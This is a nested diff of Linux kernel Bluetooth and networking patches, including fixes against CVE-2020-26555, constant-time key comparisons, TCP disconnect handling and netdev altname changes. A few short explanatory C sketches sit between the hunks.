++		 */
++		if (sec_level <= BT_SECURITY_HIGH)
++			goto encrypt;
++		break;
++	case HCI_LK_UNAUTH_COMBINATION_P192:
++	case HCI_LK_UNAUTH_COMBINATION_P256:
++		/* An unauthenticated combination key has sufficient security
++		 * for security level 2 or lower.
++		 */
++		if (sec_level <= BT_SECURITY_MEDIUM)
++			goto encrypt;
++		break;
++	case HCI_LK_COMBINATION:
++		/* A combination key always has sufficient security for
++		 * security level 2 or lower. The high security level
++		 * requires that the combination key was generated using the
++		 * maximum PIN code length (16). For pre-2.1 units.
++		 */
++		if (sec_level <= BT_SECURITY_MEDIUM || conn->pin_length == 16)
++			goto encrypt;
++		break;
++	default:
++		break;
++	}
+ 
+ auth:
+ 	if (test_bit(HCI_CONN_ENCRYPT_PEND, &conn->flags))
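The switch above works because the BT_SECURITY_* levels form an ordered scale, so each key type only needs a single <= test against the strongest level it can satisfy. An illustrative sketch with made-up enum and key-type values, not the real HCI_LK_* constants:

enum sec_level { SEC_SDP, SEC_LOW, SEC_MEDIUM, SEC_HIGH, SEC_FIPS };
enum key_kind  { KEY_AUTH_P256, KEY_AUTH_P192, KEY_UNAUTH, KEY_COMBINATION };

static int key_sufficient(enum key_kind key, enum sec_level level, int pin_len)
{
	switch (key) {
	case KEY_AUTH_P256:	/* strongest: acceptable up to FIPS */
		return level <= SEC_FIPS;
	case KEY_AUTH_P192:
		return level <= SEC_HIGH;
	case KEY_UNAUTH:
		return level <= SEC_MEDIUM;
	case KEY_COMBINATION:	/* legacy; a 16-digit PIN lifts the limit */
		return level <= SEC_MEDIUM || pin_len == 16;
	}
	return 0;
}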
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d13b498f148cc..6a1db678d032f 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2616,7 +2616,11 @@ int hci_register_dev(struct hci_dev *hdev)
+ 	if (id < 0)
+ 		return id;
+ 
+-	snprintf(hdev->name, sizeof(hdev->name), "hci%d", id);
++	error = dev_set_name(&hdev->dev, "hci%u", id);
++	if (error)
++		return error;
++
++	hdev->name = dev_name(&hdev->dev);
+ 	hdev->id = id;
+ 
+ 	BT_DBG("%p name %s bus %d", hdev, hdev->name, hdev->bus);
+@@ -2638,8 +2642,6 @@ int hci_register_dev(struct hci_dev *hdev)
+ 	if (!IS_ERR_OR_NULL(bt_debugfs))
+ 		hdev->debugfs = debugfs_create_dir(hdev->name, bt_debugfs);
+ 
+-	dev_set_name(&hdev->dev, "%s", hdev->name);
+-
+ 	error = device_add(&hdev->dev);
+ 	if (error < 0)
+ 		goto err_wqueue;
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index e4d8857716eb7..c86a45344fe28 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -25,6 +25,8 @@
+ /* Bluetooth HCI event handling. */
+ 
+ #include <asm/unaligned.h>
++#include <linux/crypto.h>
++#include <crypto/algapi.h>
+ 
+ #include <net/bluetooth/bluetooth.h>
+ #include <net/bluetooth/hci_core.h>
+@@ -3277,6 +3279,16 @@ static void hci_conn_request_evt(struct hci_dev *hdev, void *data,
+ 
+ 	bt_dev_dbg(hdev, "bdaddr %pMR type 0x%x", &ev->bdaddr, ev->link_type);
+ 
++	/* Reject incoming connection from device with same BD ADDR against
++	 * CVE-2020-26555
++	 */
++	if (hdev && !bacmp(&hdev->bdaddr, &ev->bdaddr)) {
++		bt_dev_dbg(hdev, "Reject connection with same BD_ADDR %pMR\n",
++			   &ev->bdaddr);
++		hci_reject_conn(hdev, &ev->bdaddr);
++		return;
++	}
++
+ 	mask |= hci_proto_connect_ind(hdev, &ev->bdaddr, ev->link_type,
+ 				      &flags);
+ 
+@@ -4686,6 +4698,15 @@ static void hci_link_key_notify_evt(struct hci_dev *hdev, void *data,
+ 	if (!conn)
+ 		goto unlock;
+ 
++	/* Ignore NULL link key against CVE-2020-26555 */
++	if (!crypto_memneq(ev->link_key, ZERO_KEY, HCI_LINK_KEY_SIZE)) {
++		bt_dev_dbg(hdev, "Ignore NULL link key (ZERO KEY) for %pMR",
++			   &ev->bdaddr);
++		hci_disconnect(conn, HCI_ERROR_AUTH_FAILURE);
++		hci_conn_drop(conn);
++		goto unlock;
++	}
++
+ 	hci_conn_hold(conn);
+ 	conn->disc_timeout = HCI_DISCONN_TIMEOUT;
+ 	hci_conn_drop(conn);
+@@ -5221,8 +5242,8 @@ static u8 bredr_oob_data_present(struct hci_conn *conn)
+ 		 * available, then do not declare that OOB data is
+ 		 * present.
+ 		 */
+-		if (!memcmp(data->rand256, ZERO_KEY, 16) ||
+-		    !memcmp(data->hash256, ZERO_KEY, 16))
++		if (!crypto_memneq(data->rand256, ZERO_KEY, 16) ||
++		    !crypto_memneq(data->hash256, ZERO_KEY, 16))
+ 			return 0x00;
+ 
+ 		return 0x02;
+@@ -5232,8 +5253,8 @@ static u8 bredr_oob_data_present(struct hci_conn *conn)
+ 	 * not supported by the hardware, then check that if
+ 	 * P-192 data values are present.
+ 	 */
+-	if (!memcmp(data->rand192, ZERO_KEY, 16) ||
+-	    !memcmp(data->hash192, ZERO_KEY, 16))
++	if (!crypto_memneq(data->rand192, ZERO_KEY, 16) ||
++	    !crypto_memneq(data->hash192, ZERO_KEY, 16))
+ 		return 0x00;
+ 
+ 	return 0x01;
+@@ -5250,7 +5271,7 @@ static void hci_io_capa_request_evt(struct hci_dev *hdev, void *data,
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+-	if (!conn)
++	if (!conn || !hci_conn_ssp_enabled(conn))
+ 		goto unlock;
+ 
+ 	hci_conn_hold(conn);
+@@ -5497,7 +5518,7 @@ static void hci_simple_pair_complete_evt(struct hci_dev *hdev, void *data,
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+-	if (!conn)
++	if (!conn || !hci_conn_ssp_enabled(conn))
+ 		goto unlock;
+ 
+ 	/* Reset the authentication requirement to unknown */
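The switch from memcmp() to crypto_memneq() above matters because memcmp() may return as soon as the first differing byte is found, leaking timing information about secret key material. A userspace stand-in showing the constant-time style of comparison:

#include <stddef.h>

static int ct_memneq(const void *a, const void *b, size_t len)
{
	const unsigned char *pa = a, *pb = b;
	unsigned char diff = 0;
	size_t i;

	/* Accumulate differences without early exit, so the run time does
	 * not depend on where the buffers first differ. */
	for (i = 0; i < len; i++)
		diff |= pa[i] ^ pb[i];

	return diff != 0;
}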
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 1d249d839819d..484fc2a8e4baa 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -439,7 +439,8 @@ static struct sk_buff *create_monitor_event(struct hci_dev *hdev, int event)
+ 		ni->type = hdev->dev_type;
+ 		ni->bus = hdev->bus;
+ 		bacpy(&ni->bdaddr, &hdev->bdaddr);
+-		memcpy(ni->name, hdev->name, 8);
++		memcpy_and_pad(ni->name, sizeof(ni->name), hdev->name,
++			       strnlen(hdev->name, sizeof(ni->name)), '\0');
+ 
+ 		opcode = cpu_to_le16(HCI_MON_NEW_INDEX);
+ 		break;
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 5374761f5af2c..0d5aa820fd830 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -345,7 +345,6 @@ int netdev_name_node_alt_create(struct net_device *dev, const char *name)
+ static void __netdev_name_node_alt_destroy(struct netdev_name_node *name_node)
+ {
+ 	list_del(&name_node->list);
+-	netdev_name_node_del(name_node);
+ 	kfree(name_node->name);
+ 	netdev_name_node_free(name_node);
+ }
+@@ -364,6 +363,8 @@ int netdev_name_node_alt_destroy(struct net_device *dev, const char *name)
+ 	if (name_node == dev->name_node || name_node->dev != dev)
+ 		return -EINVAL;
+ 
++	netdev_name_node_del(name_node);
++	synchronize_rcu();
+ 	__netdev_name_node_alt_destroy(name_node);
+ 
+ 	return 0;
+@@ -380,6 +381,7 @@ static void netdev_name_node_alt_flush(struct net_device *dev)
+ /* Device list insertion */
+ static void list_netdevice(struct net_device *dev)
+ {
++	struct netdev_name_node *name_node;
+ 	struct net *net = dev_net(dev);
+ 
+ 	ASSERT_RTNL();
+@@ -391,6 +393,9 @@ static void list_netdevice(struct net_device *dev)
+ 			   dev_index_hash(net, dev->ifindex));
+ 	write_unlock(&dev_base_lock);
+ 
++	netdev_for_each_altname(dev, name_node)
++		netdev_name_node_add(net, name_node);
++
+ 	dev_base_seq_inc(net);
+ }
+ 
+@@ -399,8 +404,13 @@ static void list_netdevice(struct net_device *dev)
+  */
+ static void unlist_netdevice(struct net_device *dev, bool lock)
+ {
++	struct netdev_name_node *name_node;
++
+ 	ASSERT_RTNL();
+ 
++	netdev_for_each_altname(dev, name_node)
++		netdev_name_node_del(name_node);
++
+ 	/* Unlink dev from the device chain */
+ 	if (lock)
+ 		write_lock(&dev_base_lock);
+@@ -1053,7 +1063,8 @@ static int __dev_alloc_name(struct net *net, const char *name, char *buf)
+ 
+ 		for_each_netdev(net, d) {
+ 			struct netdev_name_node *name_node;
+-			list_for_each_entry(name_node, &d->name_node->list, list) {
++
++			netdev_for_each_altname(d, name_node) {
+ 				if (!sscanf(name_node->name, name, &i))
+ 					continue;
+ 				if (i < 0 || i >= max_netdevices)
+@@ -1090,6 +1101,26 @@ static int __dev_alloc_name(struct net *net, const char *name, char *buf)
+ 	return -ENFILE;
+ }
+ 
++static int dev_prep_valid_name(struct net *net, struct net_device *dev,
++			       const char *want_name, char *out_name)
++{
++	int ret;
++
++	if (!dev_valid_name(want_name))
++		return -EINVAL;
++
++	if (strchr(want_name, '%')) {
++		ret = __dev_alloc_name(net, want_name, out_name);
++		return ret < 0 ? ret : 0;
++	} else if (netdev_name_in_use(net, want_name)) {
++		return -EEXIST;
++	} else if (out_name != want_name) {
++		strscpy(out_name, want_name, IFNAMSIZ);
++	}
++
++	return 0;
++}
++
+ static int dev_alloc_name_ns(struct net *net,
+ 			     struct net_device *dev,
+ 			     const char *name)
+@@ -1127,19 +1158,13 @@ EXPORT_SYMBOL(dev_alloc_name);
+ static int dev_get_valid_name(struct net *net, struct net_device *dev,
+ 			      const char *name)
+ {
+-	BUG_ON(!net);
+-
+-	if (!dev_valid_name(name))
+-		return -EINVAL;
+-
+-	if (strchr(name, '%'))
+-		return dev_alloc_name_ns(net, dev, name);
+-	else if (netdev_name_in_use(net, name))
+-		return -EEXIST;
+-	else if (dev->name != name)
+-		strscpy(dev->name, name, IFNAMSIZ);
++	char buf[IFNAMSIZ];
++	int ret;
+ 
+-	return 0;
++	ret = dev_prep_valid_name(net, dev, name, buf);
++	if (ret >= 0)
++		strscpy(dev->name, buf, IFNAMSIZ);
++	return ret;
+ }
+ 
+ /**
+@@ -10930,7 +10955,9 @@ EXPORT_SYMBOL(unregister_netdev);
+ int __dev_change_net_namespace(struct net_device *dev, struct net *net,
+ 			       const char *pat, int new_ifindex)
+ {
++	struct netdev_name_node *name_node;
+ 	struct net *net_old = dev_net(dev);
++	char new_name[IFNAMSIZ] = {};
+ 	int err, new_nsid;
+ 
+ 	ASSERT_RTNL();
+@@ -10957,10 +10984,15 @@ int __dev_change_net_namespace(struct net_device *dev, struct net *net,
+ 		/* We get here if we can't use the current device name */
+ 		if (!pat)
+ 			goto out;
+-		err = dev_get_valid_name(net, dev, pat);
++		err = dev_prep_valid_name(net, dev, pat, new_name);
+ 		if (err < 0)
+ 			goto out;
+ 	}
++	/* Check that none of the altnames conflicts. */
++	err = -EEXIST;
++	netdev_for_each_altname(dev, name_node)
++		if (netdev_name_in_use(net, name_node->name))
++			goto out;
+ 
+ 	/* Check that new_ifindex isn't used yet. */
+ 	err = -EBUSY;
+@@ -11025,6 +11057,9 @@ int __dev_change_net_namespace(struct net_device *dev, struct net *net,
+ 	kobject_uevent(&dev->dev.kobj, KOBJ_ADD);
+ 	netdev_adjacent_add_links(dev);
+ 
++	if (new_name[0]) /* Rename the netdev to prepared name */
++		strscpy(dev->name, new_name, IFNAMSIZ);
++
+ 	/* Fixup kobjects */
+ 	err = device_rename(&dev->dev, dev->name);
+ 	WARN_ON(err);
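dev_prep_valid_name() splits name handling into a prepare step (validate and resolve into a scratch buffer) and a commit step (copy into dev->name only after all other checks pass), so a failed namespace move no longer leaves a half-renamed device. A toy model of the split, with deliberately simplified validation:

#include <string.h>

#define NAMESZ 16

static int prep_name(const char *want, char out[NAMESZ])
{
	if (!want[0] || strlen(want) >= NAMESZ)
		return -1;		/* validate into scratch space only */
	strcpy(out, want);
	return 0;
}

static int change_name(char dev_name[NAMESZ], const char *pat)
{
	char new_name[NAMESZ] = "";

	if (prep_name(pat, new_name) < 0)
		return -1;		/* dev_name is untouched on failure */

	/* ... later checks can still bail out with no side effects ... */

	strcpy(dev_name, new_name);	/* commit only once everything passed */
	return 0;
}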
+diff --git a/net/core/dev.h b/net/core/dev.h
+index cbb8a925175a2..9ca91457c197e 100644
+--- a/net/core/dev.h
++++ b/net/core/dev.h
+@@ -61,6 +61,9 @@ struct netdev_name_node {
+ int netdev_get_name(struct net *net, char *name, int ifindex);
+ int dev_change_name(struct net_device *dev, const char *newname);
+ 
++#define netdev_for_each_altname(dev, namenode)				\
++	list_for_each_entry((namenode), &(dev)->name_node->list, list)
++
+ int netdev_name_node_alt_create(struct net_device *dev, const char *name);
+ int netdev_name_node_alt_destroy(struct net_device *dev, const char *name);
+ 
+diff --git a/net/core/pktgen.c b/net/core/pktgen.c
+index c3763056c554a..471d4effa8b49 100644
+--- a/net/core/pktgen.c
++++ b/net/core/pktgen.c
+@@ -669,19 +669,19 @@ static int pktgen_if_show(struct seq_file *seq, void *v)
+ 	seq_puts(seq, "     Flags: ");
+ 
+ 	for (i = 0; i < NR_PKT_FLAGS; i++) {
+-		if (i == F_FLOW_SEQ)
++		if (i == FLOW_SEQ_SHIFT)
+ 			if (!pkt_dev->cflows)
+ 				continue;
+ 
+-		if (pkt_dev->flags & (1 << i))
++		if (pkt_dev->flags & (1 << i)) {
+ 			seq_printf(seq, "%s  ", pkt_flag_names[i]);
+-		else if (i == F_FLOW_SEQ)
+-			seq_puts(seq, "FLOW_RND  ");
+-
+ #ifdef CONFIG_XFRM
+-		if (i == F_IPSEC && pkt_dev->spi)
+-			seq_printf(seq, "spi:%u", pkt_dev->spi);
++			if (i == IPSEC_SHIFT && pkt_dev->spi)
++				seq_printf(seq, "spi:%u  ", pkt_dev->spi);
+ #endif
++		} else if (i == FLOW_SEQ_SHIFT) {
++			seq_puts(seq, "FLOW_RND  ");
++		}
+ 	}
+ 
+ 	seq_puts(seq, "\n");
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 9d4507aa736b7..854b3fd66b1be 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -5394,13 +5394,11 @@ static unsigned int
+ rtnl_offload_xstats_get_size_hw_s_info_one(const struct net_device *dev,
+ 					   enum netdev_offload_xstats_type type)
+ {
+-	bool enabled = netdev_offload_xstats_enabled(dev, type);
+-
+ 	return nla_total_size(0) +
+ 		/* IFLA_OFFLOAD_XSTATS_HW_S_INFO_REQUEST */
+ 		nla_total_size(sizeof(u8)) +
+ 		/* IFLA_OFFLOAD_XSTATS_HW_S_INFO_USED */
+-		(enabled ? nla_total_size(sizeof(u8)) : 0) +
++		nla_total_size(sizeof(u8)) +
+ 		0;
+ }
+ 
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 5b05b889d31af..051aa71a8ad0f 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -117,7 +117,7 @@ EXPORT_SYMBOL(sk_stream_wait_close);
+  */
+ int sk_stream_wait_memory(struct sock *sk, long *timeo_p)
+ {
+-	int err = 0;
++	int ret, err = 0;
+ 	long vm_wait = 0;
+ 	long current_timeo = *timeo_p;
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+@@ -142,11 +142,13 @@ int sk_stream_wait_memory(struct sock *sk, long *timeo_p)
+ 
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk->sk_write_pending++;
+-		sk_wait_event(sk, &current_timeo, READ_ONCE(sk->sk_err) ||
+-						  (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
+-						  (sk_stream_memory_free(sk) &&
+-						  !vm_wait), &wait);
++		ret = sk_wait_event(sk, &current_timeo, READ_ONCE(sk->sk_err) ||
++				    (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
++				    (sk_stream_memory_free(sk) && !vm_wait),
++				    &wait);
+ 		sk->sk_write_pending--;
++		if (ret < 0)
++			goto do_error;
+ 
+ 		if (vm_wait) {
+ 			vm_wait -= current_timeo;
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 04853c83c85c4..5d379df90c826 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -589,7 +589,6 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending += writebias;
+-	sk->sk_wait_pending++;
+ 
+ 	/* Basic assumption: if someone sets sk->sk_err, he _must_
+ 	 * change state of the socket from TCP_SYN_*.
+@@ -605,7 +604,6 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending -= writebias;
+-	sk->sk_wait_pending--;
+ 	return timeo;
+ }
+ 
+@@ -634,6 +632,7 @@ int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 			return -EINVAL;
+ 
+ 		if (uaddr->sa_family == AF_UNSPEC) {
++			sk->sk_disconnects++;
+ 			err = sk->sk_prot->disconnect(sk, flags);
+ 			sock->state = err ? SS_DISCONNECTING : SS_UNCONNECTED;
+ 			goto out;
+@@ -688,6 +687,7 @@ int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		int writebias = (sk->sk_protocol == IPPROTO_TCP) &&
+ 				tcp_sk(sk)->fastopen_req &&
+ 				tcp_sk(sk)->fastopen_req->data ? 1 : 0;
++		int dis = sk->sk_disconnects;
+ 
+ 		/* Error code is set above */
+ 		if (!timeo || !inet_wait_for_connect(sk, timeo, writebias))
+@@ -696,6 +696,11 @@ int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		err = sock_intr_errno(timeo);
+ 		if (signal_pending(current))
+ 			goto out;
++
++		if (dis != sk->sk_disconnects) {
++			err = -EPIPE;
++			goto out;
++		}
+ 	}
+ 
+ 	/* Connection was closed by RST, timeout, ICMP error
+@@ -717,6 +722,7 @@ out:
+ sock_error:
+ 	err = sock_error(sk) ? : -ECONNABORTED;
+ 	sock->state = SS_UNCONNECTED;
++	sk->sk_disconnects++;
+ 	if (sk->sk_prot->disconnect(sk, flags))
+ 		sock->state = SS_DISCONNECTING;
+ 	goto out;
+diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
+index 2d094d417ecae..e2546961add3e 100644
+--- a/net/ipv4/esp4.c
++++ b/net/ipv4/esp4.c
+@@ -732,7 +732,9 @@ static inline int esp_remove_trailer(struct sk_buff *skb)
+ 		skb->csum = csum_block_sub(skb->csum, csumdiff,
+ 					   skb->len - trimlen);
+ 	}
+-	pskb_trim(skb, skb->len - trimlen);
++	ret = pskb_trim(skb, skb->len - trimlen);
++	if (unlikely(ret))
++		return ret;
+ 
+ 	ret = nexthdr[1];
+ 
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index eafa4a0335157..5eb1b8d302bbd 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -1325,15 +1325,18 @@ __be32 fib_info_update_nhc_saddr(struct net *net, struct fib_nh_common *nhc,
+ 				 unsigned char scope)
+ {
+ 	struct fib_nh *nh;
++	__be32 saddr;
+ 
+ 	if (nhc->nhc_family != AF_INET)
+ 		return inet_select_addr(nhc->nhc_dev, 0, scope);
+ 
+ 	nh = container_of(nhc, struct fib_nh, nh_common);
+-	nh->nh_saddr = inet_select_addr(nh->fib_nh_dev, nh->fib_nh_gw4, scope);
+-	nh->nh_saddr_genid = atomic_read(&net->ipv4.dev_addr_genid);
++	saddr = inet_select_addr(nh->fib_nh_dev, nh->fib_nh_gw4, scope);
+ 
+-	return nh->nh_saddr;
++	WRITE_ONCE(nh->nh_saddr, saddr);
++	WRITE_ONCE(nh->nh_saddr_genid, atomic_read(&net->ipv4.dev_addr_genid));
++
++	return saddr;
+ }
+ 
+ __be32 fib_result_prefsrc(struct net *net, struct fib_result *res)
+@@ -1347,8 +1350,9 @@ __be32 fib_result_prefsrc(struct net *net, struct fib_result *res)
+ 		struct fib_nh *nh;
+ 
+ 		nh = container_of(nhc, struct fib_nh, nh_common);
+-		if (nh->nh_saddr_genid == atomic_read(&net->ipv4.dev_addr_genid))
+-			return nh->nh_saddr;
++		if (READ_ONCE(nh->nh_saddr_genid) ==
++		    atomic_read(&net->ipv4.dev_addr_genid))
++			return READ_ONCE(nh->nh_saddr);
+ 	}
+ 
+ 	return fib_info_update_nhc_saddr(net, nhc, res->fi->fib_scope);
+@@ -1887,6 +1891,7 @@ int fib_sync_down_addr(struct net_device *dev, __be32 local)
+ 			continue;
+ 		if (fi->fib_prefsrc == local) {
+ 			fi->fib_flags |= RTNH_F_DEAD;
++			fi->pfsrc_removed = true;
+ 			ret++;
+ 		}
+ 	}
+diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c
+index d13fb9e76b971..9bdfdab906fe0 100644
+--- a/net/ipv4/fib_trie.c
++++ b/net/ipv4/fib_trie.c
+@@ -2027,6 +2027,7 @@ void fib_table_flush_external(struct fib_table *tb)
+ int fib_table_flush(struct net *net, struct fib_table *tb, bool flush_all)
+ {
+ 	struct trie *t = (struct trie *)tb->tb_data;
++	struct nl_info info = { .nl_net = net };
+ 	struct key_vector *pn = t->kv;
+ 	unsigned long cindex = 1;
+ 	struct hlist_node *tmp;
+@@ -2089,6 +2090,9 @@ int fib_table_flush(struct net *net, struct fib_table *tb, bool flush_all)
+ 
+ 			fib_notify_alias_delete(net, n->key, &n->leaf, fa,
+ 						NULL);
++			if (fi->pfsrc_removed)
++				rtmsg_fib(RTM_DELROUTE, htonl(n->key), fa,
++					  KEYLENGTH - fa->fa_slen, tb->tb_id, &info, 0);
+ 			hlist_del_rcu(&fa->fa_list);
+ 			fib_release_info(fa->fa_info);
+ 			alias_free_mem_rcu(fa);
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 62a3b103f258a..80ce0112e24b4 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1143,7 +1143,6 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
+ 	if (newsk) {
+ 		struct inet_connection_sock *newicsk = inet_csk(newsk);
+ 
+-		newsk->sk_wait_pending = 0;
+ 		inet_sk_set_state(newsk, TCP_SYN_RECV);
+ 		newicsk->icsk_bind_hash = NULL;
+ 		newicsk->icsk_bind2_hash = NULL;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index d79de4b95186b..62d9472ac8bca 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -148,8 +148,14 @@ static bool inet_bind2_bucket_addr_match(const struct inet_bind2_bucket *tb2,
+ 					 const struct sock *sk)
+ {
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family != tb2->family)
+-		return false;
++	if (sk->sk_family != tb2->family) {
++		if (sk->sk_family == AF_INET)
++			return ipv6_addr_v4mapped(&tb2->v6_rcv_saddr) &&
++				tb2->v6_rcv_saddr.s6_addr32[3] == sk->sk_rcv_saddr;
++
++		return ipv6_addr_v4mapped(&sk->sk_v6_rcv_saddr) &&
++			sk->sk_v6_rcv_saddr.s6_addr32[3] == tb2->rcv_saddr;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+ 		return ipv6_addr_equal(&tb2->v6_rcv_saddr,
+@@ -799,19 +805,7 @@ static bool inet_bind2_bucket_match(const struct inet_bind2_bucket *tb,
+ 	    tb->l3mdev != l3mdev)
+ 		return false;
+ 
+-#if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family != tb->family) {
+-		if (sk->sk_family == AF_INET)
+-			return ipv6_addr_v4mapped(&tb->v6_rcv_saddr) &&
+-				tb->v6_rcv_saddr.s6_addr32[3] == sk->sk_rcv_saddr;
+-
+-		return false;
+-	}
+-
+-	if (sk->sk_family == AF_INET6)
+-		return ipv6_addr_equal(&tb->v6_rcv_saddr, &sk->sk_v6_rcv_saddr);
+-#endif
+-	return tb->rcv_saddr == sk->sk_rcv_saddr;
++	return inet_bind2_bucket_addr_match(tb, sk);
+ }
+ 
+ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const struct net *net,
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 96fdde6e42b1b..288678f17ccaf 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -827,7 +827,9 @@ ssize_t tcp_splice_read(struct socket *sock, loff_t *ppos,
+ 			 */
+ 			if (!skb_queue_empty(&sk->sk_receive_queue))
+ 				break;
+-			sk_wait_data(sk, &timeo, NULL);
++			ret = sk_wait_data(sk, &timeo, NULL);
++			if (ret < 0)
++				break;
+ 			if (signal_pending(current)) {
+ 				ret = sock_intr_errno(timeo);
+ 				break;
+@@ -2549,7 +2551,11 @@ static int tcp_recvmsg_locked(struct sock *sk, struct msghdr *msg, size_t len,
+ 			__sk_flush_backlog(sk);
+ 		} else {
+ 			tcp_cleanup_rbuf(sk, copied);
+-			sk_wait_data(sk, &timeo, last);
++			err = sk_wait_data(sk, &timeo, last);
++			if (err < 0) {
++				err = copied ? : err;
++				goto out;
++			}
+ 		}
+ 
+ 		if ((flags & MSG_PEEK) &&
+@@ -3073,12 +3079,6 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	int old_state = sk->sk_state;
+ 	u32 seq;
+ 
+-	/* Deny disconnect if other threads are blocked in sk_wait_event()
+-	 * or inet_wait_for_connect().
+-	 */
+-	if (sk->sk_wait_pending)
+-		return -EBUSY;
+-
+ 	if (old_state != TCP_CLOSE)
+ 		tcp_set_state(sk, TCP_CLOSE);
+ 
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index f53380fd89bcf..f8037d142bb75 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -302,6 +302,10 @@ msg_bytes_ready:
+ 		}
+ 
+ 		data = tcp_msg_wait_data(sk, psock, timeo);
++		if (data < 0) {
++			copied = data;
++			goto unlock;
++		}
+ 		if (data && !sk_psock_queue_empty(psock))
+ 			goto msg_bytes_ready;
+ 		copied = -EAGAIN;
+@@ -312,6 +316,8 @@ out:
+ 	tcp_rcv_space_adjust(sk);
+ 	if (copied > 0)
+ 		__tcp_cleanup_rbuf(sk, copied);
++
++unlock:
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+ 	return copied;
+@@ -346,6 +352,10 @@ msg_bytes_ready:
+ 
+ 		timeo = sock_rcvtimeo(sk, flags & MSG_DONTWAIT);
+ 		data = tcp_msg_wait_data(sk, psock, timeo);
++		if (data < 0) {
++			ret = data;
++			goto unlock;
++		}
+ 		if (data) {
+ 			if (!sk_psock_queue_empty(psock))
+ 				goto msg_bytes_ready;
+@@ -356,6 +366,8 @@ msg_bytes_ready:
+ 		copied = -EAGAIN;
+ 	}
+ 	ret = copied;
++
++unlock:
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+ 	return ret;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 5df19f93f86ab..7ebbbe561e402 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -1818,6 +1818,7 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ #ifdef CONFIG_TLS_DEVICE
+ 	    tail->decrypted != skb->decrypted ||
+ #endif
++	    !mptcp_skb_can_collapse(tail, skb) ||
+ 	    thtail->doff != th->doff ||
+ 	    memcmp(thtail + 1, th + 1, hdrlen - sizeof(*th)))
+ 		goto no_coalesce;
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 443b1cab25299..cc7ed86fb0a57 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -2489,6 +2489,18 @@ static bool tcp_pacing_check(struct sock *sk)
+ 	return true;
+ }
+ 
++static bool tcp_rtx_queue_empty_or_single_skb(const struct sock *sk)
++{
++	const struct rb_node *node = sk->tcp_rtx_queue.rb_node;
++
++	/* No skb in the rtx queue. */
++	if (!node)
++		return true;
++
++	/* Only one skb in rtx queue. */
++	return !node->rb_left && !node->rb_right;
++}
++
+ /* TCP Small Queues :
+  * Control number of packets in qdisc/devices to two packets / or ~1 ms.
+  * (These limits are doubled for retransmits)
+@@ -2526,12 +2538,12 @@ static bool tcp_small_queue_check(struct sock *sk, const struct sk_buff *skb,
+ 		limit += extra_bytes;
+ 	}
+ 	if (refcount_read(&sk->sk_wmem_alloc) > limit) {
+-		/* Always send skb if rtx queue is empty.
++		/* Always send skb if rtx queue is empty or has one skb.
+ 		 * No need to wait for TX completion to call us back,
